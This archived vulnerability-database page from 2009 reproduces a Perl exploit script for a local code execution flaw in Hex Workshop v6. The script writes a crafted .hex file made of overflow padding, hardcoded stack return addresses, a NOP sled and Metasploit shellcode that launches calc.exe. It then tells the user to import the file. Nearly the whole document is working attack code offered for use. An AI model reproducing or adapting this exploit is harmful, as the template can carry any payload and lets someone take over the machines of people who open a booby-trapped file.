Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21409
HistoryMar 02, 2009 - 12:00 a.m.

Hex Workshop <= v6 (.hex) File Local Code

2009-03-0200:00:00
vulners.com
9

#!/usr/bin/perl -w

Hex Workshop <= v6 (.hex) File Local Code Execution

Discovred by : Security^Ghost

Exploited by : DATA_SNIPER

Exploit Tested on WindoZ XP SP2 FR.

for more information vist my blog:http://datasniper.arab4services.net/

the exploit it's so weird ;),take look at the shellcode,and remember it's not AlphaNum.

print "==========================================================================\n";
print "Hex Workshop v6 (.HEX File) Local Code Execution\n";
print "Exploited by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "for more: http://datasniper.arab4services.net/&#92;n&quot;;
print "===================================================================== \n";
$junk=":0000FC\x0D\x0A:";
$shelladd="B8EE1300D0EE1300C8EE1300AAAAAAAAC8EE1300C8EE1300";#shell address in the stack and some address junk for make
the exploit work as well.
#some times the stack address change to "0012xxxx" so you can use this instead

$shelladdrr="B8EE1200D0EE1200C8EE1200AAAAAAAAC8EE1200C8EE1200"

$nop="909090909090909090909090909090";# strange noop xD
#shellcode from metasploit,execute calc.exe
#shellcode copied as it's and when the data being treated will be converted to HEX format.
$shellcode="33c9b11ebbf01a028cdaccd97424f45a83c204315a0b035afbf8f77013b8f788e3cabdb468b038bd6fa6c87277b390ac86286726bc2579d68df9e38a693967d4b07085dbf06e62e0a0548f62ad1ed0a82cca893b2247dd6326560a104ad3cdccfbbfe9163860c3e0dec9478658c60cd868ad63c5dd3aebfd94c56f3dcc6518c0c864ab547096c6abd79830d0b60adc17";
$buff='A' x 248;
$sploit =$junk.$buff.$shelladd.$nop.$shellcode;
$fle = "Xploit.hex" ;
open($data, ">>$fle") or die "Cannot open $data";
print $data $sploit;
close($data);
print "$fle has been created\n";
print "open it in HexWorkshop file->import.\n";